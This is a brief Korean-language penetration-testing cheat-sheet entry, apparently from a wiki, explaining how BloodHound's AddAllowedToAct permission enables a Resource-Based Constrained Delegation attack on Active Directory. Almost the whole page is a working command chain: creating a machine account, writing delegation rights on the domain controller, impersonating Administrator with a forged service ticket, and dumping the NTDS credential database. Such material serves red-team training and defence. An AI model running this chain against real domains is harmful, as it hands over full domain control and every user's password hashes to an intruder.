AddAllowedToAct
객체에 대해 Write msDS-AllowedToActOnBehalfOfOtherIdentity 권한이 있다면 블러드하운드에서 AddAllowedToAct로 표시되며 Resource Based Constrained Delegation 공격이 가능합니다.
# 새로운 머신 계정 생성
impacket-addcomputer -computer-name 'RBCD$' -computer-pass 'Password123!' -dc-host ad01.contoso.com contoso.com/user-A:'Password123!'
# 타겟의 RBCD에 계정 등록
impacket-rbcd -delegate-from 'RBCD$' -delegate-to 'AD01$' -action write contoso.com/user-A:'Password123!'
# 등록된 계정을 통해 TGT 발급
impacket-getST -spn cifs/ad01.contoso.com -impersonate Administrator contoso.com/RBCD$:'Password123!'
export KRB5CCNAME=Administrator.ccache
# NTDS 덤핑
crackmapexec smb contoso.com -u Administrator --use-kcache --ntdsReferences
Last updated
Was this helpful?